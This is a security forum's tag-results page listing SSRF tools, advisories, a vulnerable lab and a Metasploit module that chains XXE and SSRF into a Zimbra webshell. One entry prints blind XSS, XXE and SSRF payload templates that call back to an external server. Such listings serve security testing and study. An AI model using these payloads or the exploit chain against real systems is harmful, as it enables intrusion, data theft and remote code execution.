Showing results for tags 'ssrf'.

Found 11 results

  1. A Burp Suite extension was made to automate the process of finding reverse proxy path-based SSRF.
  2. BurpParamFlagger A Burp extension adding a passive scan check to flag parameters whose name or value may indicate a possible insertion point for SSRF or LFI. Note: I believe that Burp Pro is required to use this extension since it adds to the scanner functionality, which isn’t included in the Community version.
  3. ssrf-king
     SSRF plugin for Burp that automates SSRF detection in all of the requests.
     Upcoming Features Checklist
       • ✔️ It will soon have a user interface to specify your own call back payload
       • It will soon be able to test Json & XML
     Features
       • ✔️ Test all of the requests for any external interactions.
       • ✔️ Checks to see if any interactions are not the user’s IP if it is, it’s an open redirect.
       • ✔️ Alerts the user for any external interactions with information such as:
           • Endpoint Vulnerable
           • Host
           • Location Found
     It also performs the following tests based on this research.
     Scanning Options
       • ✔️ Supports Both Passive & Active Scanning.
     Example
       • Load the website you want to test.
       • Load the plugin.
       • Keep note of the Burp Collab Payload.
       • Passively crawl the page, ssrf-king test everything in the request on the fly.
     SSRF Detection
     When it finds a vulnerability it logs the information and adds an alert. From here onwards you would fuzz the parameter to test for SSRF.
     SSRF-King v1.12
     I have released v1.12 that has a small UI Design where you can specify your own call-back payload.
     Changes:
       • Implemented checkbox for http:// and https://
       • Plugin now uses JDK 14 code compliance 9 which should work with all versions, let me know if it doesn't
     Bug fixes:
       • Fixed parameter testing. When it reported a X-Forwarded-Host it came up as X-Forwarded-For
       • The test cases for the following are now fixed and work.
  4. lorsrf Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods.
  5. SSRFIRE
     An automated SSRF finder. Just give the domain name and your server and chill! 😉 It also has options to find XSS and open redirects.
     Finding XSS
     Warning: This generates a lot of traffic. Do not use this against the sites which you are not authorized to test.
     This tests all the URLs fetched, and based on how the input is reflected in the response, it adds that particular URL to the output/domain.com/xss-suspects.txt (This may contain false positives). For further testing, you can input this list to the XSS detection tools like XSStrike to find XSS.
     Finding open redirects
     Just enter the path to a payload file or use the default payload. I personally prefer openredirex, as it is specifically designed to check for open redirects by loading the URLs from the list and it looks a lot cleaner, and doesn’t flood your terminal.
  6. Various Open-Xchange OX App Suite versions suffer from server-side request forgery, cross site scripting, information disclosure, and improper access control vulnerabilities.
  7. Server-Side Request Forgery (SSRF) vulnerable Lab
     This repository contains PHP code which is vulnerable to Server-Side Request Forgery (SSRF) attacks.
     I would like to say Thank You to @albinowax, AKReddy, Vivek Sir (for being great personalities who always supported me), Andrew Sir - @vanderaj (for his encouraging words) and those researchers who contributed to DNS rebinding attack based research.
     The vulnerable code is meant to demonstrate SSRF for the 5 scenarios mentioned below:

     1. Application code that fetches and displays the content of the specified file
     In programming languages, there are functions which can fetch the contents of a locally saved file. These functions may be capable of fetching content from remote URLs as well as local files (e.g. file_get_contents in PHP). This functionality can be abused if the application is not prepending any string to the user supplied data to fetch the content from a file, i.e. the application is not prepending any directory name or path to the user supplied data. In this case, these data fetching functions can process schemes like "http://" or "file://". When the user specifies a remote URL in place of a file name, like "[Hidden Content]", the data fetching function extracts the data from the specified URL. If the application is prepending any data string (for example any directory name) to the user data, the "http://" or "file://" scheme won't work and exploitation of the SSRF vulnerability is not possible.
     Guide to Exploitation of Scenario 1

     2. Application provides interface to connect to Remote Host
     The web application has interfaces that allow a user to specify any IP with any port. Here the application has functionality which tries to connect to a service like "MySQL", "LDAP" etc. The application expects the user to specify the remote server hostname/IP, username and password in input fields. The application then tries to connect to the remote server over the specified port. In this scenario, the application tries to communicate with a remote service listening on a specific port. When the vulnerable code has functionality to connect to a server like MySQL and the user specifies the SMB port, the vulnerable application will try to communicate with the SMB service using MySQL server service packets. Even though the port is open, we are not able to communicate with the service due to the difference in the way of communication. This behaviour can be exploited to perform internal network scanning, not just to enumerate IPs but ports as well on those live IPs.
     Guide to Exploitation of Scenario 2

     3. Application with File Download Functionality
     In this case, an attacker can exploit this functionality to perform IP scanning inside the network where the application server is hosted. The function which performs the task of downloading a file from the server can download a file not just from the local server but from an SMB path as well. This is something which can help an attacker to figure out the Windows based machines in the network. A web application hosted on Windows OS will process the SMB path as well if the file download functionality is processing user input without prepending any data.
     Guide to Exploitation of Scenario 3

     4. Bypassing IP blacklisting using DNS Based Spoofing
     The script has functionality which allows the user to fetch data from a remote URL. The user needs to specify the remote URL with any IP or domain name. The script checks whether the user has specified the input as "localhost", "Internal IPs" or "Reserved IPs". If the domain/IP specified by the user is blacklisted, the script will not fetch the content and stops processing.
     Guide to Exploitation of Scenario 4

     5. Bypassing IP blacklisting using DNS Rebinding Technique
     The application has implemented blacklisting of not just internal and private range IPs; it also resolves the user supplied domain to its IP and again checks whether the resolved IP is blacklisted or not. In this case, the DNS based spoofing trick will also not work to access the content hosted on an internal/reserved IP. The application code performs domain resolution to its IP and again performs the blacklisted IP check for the resolved IP.
     Guide to Exploitation of Scenario 5

     Of course,
     --==[[ With Love From IndiShell ]]==--
     --==[[ Greetz To ]]==--
     Guru ji zero, Code breaker ICA, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad, Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256 Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, D2, Bikash Dash and rest of the Team INDISHELL
     --==[[Love to]]==--
     My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Hacker fantastic, Jennifer Arcuri, Thecolonial, Anurag Bhai Ji and Don(Deepika kaushik)
  8. 0x1

    B-XSSRF

    Toolkit to detect and keep track on Blind XSS, XXE & SSRF

    SETUP
      • Upload the files to your server.
      • Create a Database and upload database.sql file to it.
      • Change the DB Credentials in db.php file.
      • Ready.

    USAGE

    BLIND XSS
      <embed src="[Hidden Content];
      <script src="[Hidden Content];

    BLIND XXE
      <?xml version="1.0" ?>
      <!DOCTYPE root [
      <!ENTITY % ext SYSTEM "[Hidden Content]; %ext;
      ]>
      <r></r>

    SSRF
      GET /testssrf.php=[Hidden Content]

    DEFAULT CREDENTIALS
      USER : [email protected]
      PASS : 123456

    Source & Download
  9. This Metasploit module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the zimbra account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the zimbra credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the Client Upload servlet is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
  10. SSRF are often used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
  11. Open-Xchange OX App Suite suffers from cross site scripting and server-side request forgery vulnerabilities. The vulnerabilities span a multitude of versions.